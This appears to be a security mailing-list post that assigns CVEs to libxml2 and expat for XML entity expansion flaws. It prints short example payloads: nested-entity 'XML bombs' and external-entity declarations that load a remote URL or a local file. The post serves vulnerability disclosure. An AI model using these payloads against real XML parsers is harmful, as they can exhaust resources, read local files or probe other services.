So here are the CVE's for the two big ones, libxml2 and expat. Both
are affected by the expansion of internal entities (which can be used
to consume resources) and external entities (which can cause a denial
of service against other services, be used to port scan, etc.).
To be clear:
====================
Internal entity expansion refers to the exponential/quadratic/fast
linear expansion of XML entities, e.g.:
====================
<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>
or
<!DOCTYPE bomb [
<!ENTITY a "xxxxxxx... a couple of ten thousand chars">
]>
<bomb>&a;&a;&a;... repeat</bomb>
Which causes resources to be consumed
====================
External entity expansion refers to the loading of external resources
such as XML entities from another server or a local file:
====================
<!DOCTYPE external [
<!ENTITY ee SYSTEM "http://www.example.org/some.xml";>
]>
<root>ⅇ</root>
<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>ⅇ</root>
Which can cause resources to be consumed or can result in port
scanning /application scanning information being sent to the attacker.
So the CVE's to use:
Please use CVE-2013-0338 for libxml2 internal entity expansion
Please use CVE-2013-0339 for libxml2 external entities expansion
Please use CVE-2013-0340 for expat internal entity expansion
Please use CVE-2013-0341 for expat external entities expansion
If you know of other XML libraries that are vulnerable (and open
source =) please let oss-sec know so we can assign CVEs.